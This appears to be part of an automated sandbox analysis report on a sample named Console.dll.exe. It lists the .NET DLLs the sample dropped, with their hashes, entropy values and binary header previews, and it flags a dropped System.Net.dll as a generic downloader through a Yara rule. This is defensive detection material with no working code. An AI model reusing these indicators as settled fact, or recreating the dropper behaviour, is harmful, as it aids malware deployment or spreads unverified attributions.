                                                                                                                                                                                                                        Size (bytes):321712
                                                                                                                                                                                                                        Entropy (8bit):6.518455044288715
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:wnxKgODQv1Y9XN7tMe15VxZIDUdDpbax3snVYFY:wngzDQt+Eekrx3CVJ
                                                                                                                                                                                                                        MD5:E368BA70E3A5488D3CDDF1DDB55C6990
                                                                                                                                                                                                                        SHA1:1865AC9A5EDFDED6E0F8E170F541D2E60029C120
                                                                                                                                                                                                                        SHA-256:554CB2311B631A43CDE84CDC2D10E4926DCF419B0361F8FFCD656CEA407882FB
                                                                                                                                                                                                                        SHA-512:CEE43CA06F88866412C840D38B73C246810F24CAFA98771515C2A7D18E7C06B2F4F869447B8276B139C54E5B4DF18BED0DF97B1AD1DD547D8694F133D7A57DF8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;............!......................... ....@.................................O.....@.............................................p....R...........(.......0..8)..p...........................................................p...H............text...{........................... ..`.data....R... ...`... ..............@....reloc...0.......@..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Security.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):604320
                                                                                                                                                                                                                        Entropy (8bit):6.84548654261383
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:IRgGBb3mlN3fx6Eiizcm6QaKCOEthhFEN6tTGRTQlNJ:IR7mNvliizcmzaBOM46tT+2
                                                                                                                                                                                                                        MD5:6FF76DE802471652AE8B9FD1C1396327
                                                                                                                                                                                                                        SHA1:002D41DC799570E935F1D02D61574E3C108F5366
                                                                                                                                                                                                                        SHA-256:F2461F270C97A57520B373C61D8F32F3BAD10671D28A0E8EF8786EFFC193E3FB
                                                                                                                                                                                                                        SHA-512:B12C53E8EFA8E5C13751BF5DDAAA2E36054A24A9FF27B19BAD774FAC1BCC5A25D8F6B7BB545CB6756E85306EDD5923408BE995AD3D683717649BB4D1AB646931
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{P+............!......................... ....@.................................48....@.............................................p................(......<K..D+..p...........................................................p...H............text............................... ..`.data........ ....... ..............@....reloc..<K.......P..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.ServicePoint.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):43184
                                                                                                                                                                                                                        Entropy (8bit):5.529636729337993
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:Y0s1tBNCpKzC/Y7p7roiIn02AmrEj1DuO9zr:Y0sXzUKO6pYiGEj9zr
                                                                                                                                                                                                                        MD5:1184C9322A7B2FF0360831A57B30430D
                                                                                                                                                                                                                        SHA1:D8DFE38AF72FCCABF8C77295C83437E650DDFC99
                                                                                                                                                                                                                        SHA-256:5FC0F596EE3F3F08FB2F8B0D604D0D84C58A51F18B5367F760B3ED201217473A
                                                                                                                                                                                                                        SHA-512:F26C07E7D8813DE9C5ED85748EEC0A252FA0F513163C8804A5BC50BBA29E937E85F073970EEDDB774BFA8F8F3CBF364E0C6A5602594288B6A4F3F68FCBEFE118
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!.....P... ...............`....@.................................p.....@.................................................x............(...p......L...p...............................................................H............text...8N.......P.................. ..`.data........`.......`..............@....reloc.......p.......p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Sockets.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):481440
                                                                                                                                                                                                                        Entropy (8bit):6.73607815231355
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:xLP6+HwdlTxLJNvQcR3yXEUgsMV+Dem1EOPUIqd25k:xGR/xr93yXLEADem9o2i
                                                                                                                                                                                                                        MD5:52BDEBB9A48D2697F31097ADEBB04B14
                                                                                                                                                                                                                        SHA1:00CACBA5B98EC09CACF2F1A6E6894D00073A362B
                                                                                                                                                                                                                        SHA-256:F166CFD4C6DAF84B988B59FBE2AA4C8A6E4A6FD222BBA38D5612FE16A125D23D
                                                                                                                                                                                                                        SHA-512:F7C2FBD1F954CB89D6A054BFDC2AD7A8F7154008A8A784B1AD2825689819A08E44CBD623EF45B39063BF93DA6FA19446561D86F1DB51A07073F33C39777EA8F4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....p........................@..........................0............@.............................................p....}.......0...(......<E..\4..p...........................................................p...H............text....d.......p.................. ..`.data....Y.......`..................@....reloc..<E.......P..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebClient.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):149680
                                                                                                                                                                                                                        Entropy (8bit):6.523102299701999
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:eI1ZCoKAbkIJ55jAfyTpdY3ykJ9rivFyug/Mxp96:p1ZpvoIJAQp+uk4k
                                                                                                                                                                                                                        MD5:E51A3F4E6D0D583EF91E2703C70598DA
                                                                                                                                                                                                                        SHA1:19AA75A97BE4E750E39FAECB62B6DC14612CF564
                                                                                                                                                                                                                        SHA-256:EC0417DD5030FA979F8D1CBE12630B6951214BE8BC0925FEBA9AA7E7158FFA51
                                                                                                                                                                                                                        SHA-512:0469ECDBDC994E907426F4237EC33645B81D575F11C14AC39C4E34EACFCFC5118F78A9AD996203B519383FAAB69045BED02EF0603F47C2FACFCDBCEBB4872ECC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u=/............!.........P....................@.......................... ............@.......................................................... ...(......D...0...p...............................................................H............text............................... ..`.data....*.......0..................@....reloc..D........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):63664
                                                                                                                                                                                                                        Entropy (8bit):5.977551550427645
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:FJi3SV4gghcoFT0Yx82s88krahmqOwA83qJKAFE6WHKV6q6G22N7XK6RH4wqYXYl:FJixXoYx82s88krahmqOwA83qJKAFE6G
                                                                                                                                                                                                                        MD5:4CDC723447C0ED9852D2E66B8C332B51
                                                                                                                                                                                                                        SHA1:B323C9EB8B77504269D1CBA53538D8C919FC06E2
                                                                                                                                                                                                                        SHA-256:A57EFC131EA6DFF83B92AF8ACE580C42D9BE7C6DA33E799C6D09E013DF3BE4D6
                                                                                                                                                                                                                        SHA-512:703C2799F1E7EC4B2514B08CA733DDD78EF83721915890D38F0572F407861D8F9E5C5283DBF27918B69570068AD5DD66A87C6B00A84913218B81AF733B9986D3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*.............!......... ....................@.................................tJ....@..............................................................(......h.......p...............................................................H............text............................... ..`.data...R...........................@....reloc..h...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebProxy.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):43168
                                                                                                                                                                                                                        Entropy (8bit):5.358405148758311
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:y3WlwWigCXCEKHcIh4cbOJ0K5JbCLv+CTDLfyO4BkUbETb2HRN7ePVT/6fR9zjgl:yCPCyDc70K5JLO4BdI/isc9zK
                                                                                                                                                                                                                        MD5:5BDDA9F077BF1950764070239D2A51C3
                                                                                                                                                                                                                        SHA1:4D3DB690E54432D000A20CD29379C3AB91925DBF
                                                                                                                                                                                                                        SHA-256:BD88429C1D95ECE17685C9F890E0C214948A331B81A3A34D8BCB087E1366D422
                                                                                                                                                                                                                        SHA-512:F9D1E8B47FA4FB3AC2B4425D73ECC9B33E58A9AF6DB0C1A34D66A328A7F13BE3CB2710B7A0CDAC2A185F3142D6C527C20FA2405DC913960EEACEEE13C9A1B230
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!.....P... ...............`....@.......................................@.............................................p...$...P........(...p..$.......p...........................................................p...H............text...UF.......P.................. ..`.data...s....`.......`..............@....reloc..$....p.......p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):92320
                                                                                                                                                                                                                        Entropy (8bit):6.153161542389182
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:IgKDu9IUeVRYE1C+LUAJzWT7b7Fhfkf8n5iJziJ:IgKDDlVRY1+LrJzI7b7FVkf8n8uJ
                                                                                                                                                                                                                        MD5:4AD6CF546C047E1399B7787E40A24521
                                                                                                                                                                                                                        SHA1:33167CC9802DB8D6F3332462610F398297225EF0
                                                                                                                                                                                                                        SHA-256:9D597D712E7DF977647D9D49FB910EE084DCB9B180A6C043BFB8D3F48F123102
                                                                                                                                                                                                                        SHA-512:C9268C269D432CBB576DF586C37F9DDE5F37F2696629CD412CC9EC76895678E3F8322825761DC2D212856F5268402BD96B4ED130655261B4F16D0B6DDFBA00DC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n............!.........0....................@..........................@......*<....@..................................................$.......@...(...0..........p...............................................................H............text............................... ..`.data...Y........ ..................@....reloc.......0.......0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):170144
                                                                                                                                                                                                                        Entropy (8bit):6.56080614797122
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:pJ0RDtp1ntMgEoAWC5IUQeu0IeW+Wom3y9pYLbkbmvh4dk2iO034LemAVBWd:ELp1tGo+WQzIeW+Wonmvh+dD034Lery
                                                                                                                                                                                                                        MD5:8E5CDF3ADF9F6A56926234DCE59A151E
                                                                                                                                                                                                                        SHA1:DAEA19E66BAF98B2F367C1BFAB8B1F8A053B1022
                                                                                                                                                                                                                        SHA-256:85218EEABCCFA50A1FEEB79C54B2C9DA9303532DED5ECA12E843C1AA1576087D
                                                                                                                                                                                                                        SHA-512:CD11C4EA1077A8C7F2B70FB598368358E6554DB3068AE842425FD3B6AC6B38FAFE497E962FFD01DF351A2B51C2E0BA23A0D9CB1A3CB01C3574893E4A46BC2B0A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!.........P............... ....@..........................p.......w....@..................................................5..8....p...(...P..x.......p...............................................................H............text...)........................... ..`.data....*... ...0... ..............@....reloc..x....P... ...P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17672
                                                                                                                                                                                                                        Entropy (8bit):6.619747442184973
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:0hubcrkpKZyS3gxAsWaYW0VaWi5uWXebPpUNTQHnhWgN7acWdyttuX01k9z3AWPs:2313+LWaYW0VaWi5Tb2HRN7nSR9zdPad
                                                                                                                                                                                                                        MD5:300F33437A94DCD722D0E472F850D882
                                                                                                                                                                                                                        SHA1:F4F804015DD0FF7310AE155DBA87A0BE73C1FB1C
                                                                                                                                                                                                                        SHA-256:1C4D7F6BA5A285A198F15B7458A88E674579C6BE38EF06C7F9F9EC220AC74952
                                                                                                                                                                                                                        SHA-512:662DF8018F3F2451CC5ED88F654EA298DD819E9393D6919B99B7F7CFE7A9F4827076819981C585647527D7DA252DD3AFAAC92F9E3BF2CFE30A7AB6684F346D86
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dll, Author: Joe Security
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9$..........." ..0..............1... ...@....... ....................................`..................................0..O....@..4................)...`......./..T............................................ ............... ..H............text... .... ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................0......H.......P .. ...................p/......................................BSJB............v4.0.30319......l.......#~..|.......#Strings............#US.........#GUID.......|...#Blob......................3................................6.....x.........................../.......L.................................p...........................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.C...+.Y...3.o...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Numerics.Vectors.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.714189429168331
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:y9+itxuWpBWiVuWXebPpUNTQHnhWgN7acWeuWyttuX01k9z3AWPoD9HoCf1:y99uWpBWiVTb2HRN7TmSR9zdPauC9
                                                                                                                                                                                                                        MD5:D41AF5E2DB31134DEC48AA17B2136BF5
                                                                                                                                                                                                                        SHA1:712AE23BB2CF6490AB88F1FCCBFAD8592059D3C5
                                                                                                                                                                                                                        SHA-256:327F2744A5D102CFBFC3939F5A1137D3D7C1F989B3E3FB6950395F6AEE97D8BC
                                                                                                                                                                                                                        SHA-512:500A7001358B564959F428ADD1494076EEE19CADDDDBC8DEFAA2F9FA200A0FD66557B6F39459A1BC656E47DEFF259953A0961EA02AB8974DD4D5F8E34D0D9AA1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....v..........."!..0.............n*... ........@.. ............................../.....`..................................*..P....@...................)...`......()..T............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P*......H........ ..X...................P ......................................y..8:JU\...r|.6.|....=I.w..8e.k.p[..x...}gx+......7.".Qo]..<.e.x.I....p..(.N.:....q.k;...(pL.<......2j5=$c{ .W.-?.i..e...BSJB............v4.0.30319......`...8...#~..........#Strings............#GUID...........#Blob......................3......................................D.........]...........v.................\.r.....r.....`...8.....0.......r.....r.....r.....r.....r...}.r.....r...........6.....

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Numerics.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15632
                                                                                                                                                                                                                        Entropy (8bit):6.729663967215771
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:613rWhNWihTb2HRN7zkXC4deR9zZjmNZT:K3yH/izkXC4dC9zZjyx
                                                                                                                                                                                                                        MD5:FE747A0DB270DEDF92109DEAF7EB9EB1
                                                                                                                                                                                                                        SHA1:4302A8A727D39D35ABFD91701FEF3CA1BBE1F094
                                                                                                                                                                                                                        SHA-256:CDD9F968333201970C8460F86ABD202EE667462FFC04CB49A8E1E4E62ED9638C
                                                                                                                                                                                                                        SHA-512:E69DCB16DB7A829F630EAD308F0C488EF71CD0F39355EFCE0A4360E1FA86DAA30A717E4D56071D8EEE8E85621BA1611162864BEDAC5963D798D5146D61AEA829
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9..........." ..0.............Z)... ...@....... ....................................`..................................)..O....@..T................)...`......((..T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B................;)......H.......P ..X....................'......................................BSJB............v4.0.30319......l...8...#~..........#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................'.f.....f...e.S...............K...........{...........`.......................G.....y.......-...........%.....%.....%...).%...1.%...9.%...A.%...I.%...Q.%...Y.%...a.%...i.%...q.%...y.%.......:.....C.....b...#.k...+.....+.....3.....;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ObjectModel.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):71840
                                                                                                                                                                                                                        Entropy (8bit):6.102890222176529
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:Ua3x8Oz0p39lCEqf7QVwvGUPLJoUQSsjPaoWrxUAZ+5bLD3/ouTTiWDJjmnn/isU:Uaxz0pevf7fNlQSstWrHGb3ZTjp0i2zK
                                                                                                                                                                                                                        MD5:54A81C6B9EC868ACE3D6E917E6E88A49
                                                                                                                                                                                                                        SHA1:163AC505570984E0BE27DF20C2D6711E38CD554B
                                                                                                                                                                                                                        SHA-256:F1DF3F4CB089CBC10A619FF15AC0A936C6F328D382E4151DFF1A6E9A52BFE0E1
                                                                                                                                                                                                                        SHA-512:CC20738A210F12B143526C8D5ED49A28794C366B8CDD0973BCE5A38952BD4469C77BB94A1E50A813A61A4D59B84035EA3E1E240735F1B3B78AF5E1ACF748D07E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...vn.............!......... ....................@.................................e.....@.............................................p...d...p........(......`.......p...........................................................p...H............text............................... ..`.data...............................@....reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.CoreLib.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):12527776
                                                                                                                                                                                                                        Entropy (8bit):6.934439815907042
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:kW+RoUNsmFbnz7UpGj6hJ4jtKUsYBfAR947/G8/B3/wzg+6uaeCMtWYk:T+RXn0pq6hJHUsYxa947/G85w8MaeCMe
                                                                                                                                                                                                                        MD5:706BAC48BAC967F23E8C1C637B3216AB
                                                                                                                                                                                                                        SHA1:AE6765D15D16D2AA3DF2EC6BF91C40D455AA8F39
                                                                                                                                                                                                                        SHA-256:0A942E461FF84906B333E93407F18052D44FE0757EFEB1E6AF5600B00D5E71F9
                                                                                                                                                                                                                        SHA-512:A739E651C5681107FAB57B4B1B73F6562E2FAA250ECE8059A8660F4EF71079C0C01491511304468CB15AB192A60C1D3E7C2D089813E142B12BAB6D2A38C7B6A3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................!.........p....................@......................................@..................................................*...........(......#......p...............................................................H............text...Is.......................... ..`.data...P<.......@..................@....reloc...#......0.................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.DataContractSerialization.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1927328
                                                                                                                                                                                                                        Entropy (8bit):6.814735384184806
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:sxlNWXlqqchgctshj4vqMRdDRAmglxOouLsZ2DLWhTkH:swSEhTkH
                                                                                                                                                                                                                        MD5:B1645BC5352606D442C6C1A1F92E1B3D
                                                                                                                                                                                                                        SHA1:BE8EB990409591C258B760267E7B1C5465AF6D3F
                                                                                                                                                                                                                        SHA-256:25B38561EE32F869A659BBCEF1E51F114FEF7424D491C140CD99808CB28100E6
                                                                                                                                                                                                                        SHA-512:48B8B23018D2335D939C8B475694626E213FF1FF6FE5AADB80A8936EB5683D9EBA8E902C0C0DBC71B501ADF5D4AD39C491ED1B8B4CEA0E57EC7C3F5CEEF742C2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._............!.........p....................@..........................@............@............................................. ............@...(.......$..4v..p........................................................... ...H............text...v........................... ..`.data...v=.......@..................@....reloc...$.......0..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Uri.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):247968
                                                                                                                                                                                                                        Entropy (8bit):6.795313773885982
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:RepZlhQPHd3i/U8MG3ZZkeVmtGhSI/aSyRk:RerlhQf+7MG3ZqamtGhSICM
                                                                                                                                                                                                                        MD5:F11D5DB8F2EF84E3C430A635D7687E07
                                                                                                                                                                                                                        SHA1:156858F64E2C0A37D126530AE5649FDAC0CDA073
                                                                                                                                                                                                                        SHA-256:7B58ACE669A2F64AF0409FFC17680E7B2654B43654DF3C84B193B651E514BA64
                                                                                                                                                                                                                        SHA-512:90C00157A36B82F0D14F800ECE3CA74A9240EE3D66B772BBC009555E47CC83A2CFD01EE86353220BA46FDE3912B70008B41D49C27CFF6A43785D3018C31F7F31
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.............!.....P...@...............`....@.......................................@.............................................p....G...........(......`.......p...........................................................p...H............text....O.......P.................. ..`.data...}....`... ...`..............@....reloc..`........ ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Xml.Linq.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):366752
                                                                                                                                                                                                                        Entropy (8bit):6.733873611147737
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:sZ1z7aYyPI54mhvK4HgTNrj8pXQgCF8SjC4YflYW7nfQUZmxwp:sXWpPI54mhvK4Hcw/WzCHd/7wep
                                                                                                                                                                                                                        MD5:C7CD273DD53063385DFC32116A71C350
                                                                                                                                                                                                                        SHA1:10E6753F51D0B39DCDCE685683169E1EC88211F1
                                                                                                                                                                                                                        SHA-256:D0FE9ECED9447B5ADD459501152C4A02665B1EA46BDB59528124FDA5B3DB46D1
                                                                                                                                                                                                                        SHA-512:7736982F5738D67097F4FEEED1966DAF5A22696518906D55D39BFDB0946F6BD2F1BEE56E3319097CFC805686D57B91996ADB07CD6E6793BA8E19EA20A4A9236E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y%.............!..............................@..........................p.......3....@.................................................<k.......p...(...0..(1...*..p...............................................................H............text............................... ..`.data...^K.......P..................@....reloc..(1...0...@...0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Xml.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):7415984
                                                                                                                                                                                                                        Entropy (8bit):6.8711613209895495
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:W7Ehhq5SxFpMV6EdPTyhYw2VvocP0PtUME+MQwO:KEhhq5SxFp66EdPMYdvoc8PtUGv
                                                                                                                                                                                                                        MD5:D6747532F3BE25A6AF969A3DF229F917
                                                                                                                                                                                                                        SHA1:D597B022A683A2762F4E5F14F0062BA2E42D9AF6
                                                                                                                                                                                                                        SHA-256:20141488F9FCCC277167BD8CF51AC2B9CCC808E31332D0D10F83C7BAB3F9CF8F
                                                                                                                                                                                                                        SHA-512:66084AA981289144A1C341A1F8D8889CB16B240A580539DF059E325E4B28B46B38CEC5FFE44457C93467F352F5F66CC9F241DDB6B6E8C5CF0D5A5F7F63660D9E
                                                                                                                                                                                                                        Malicious:false
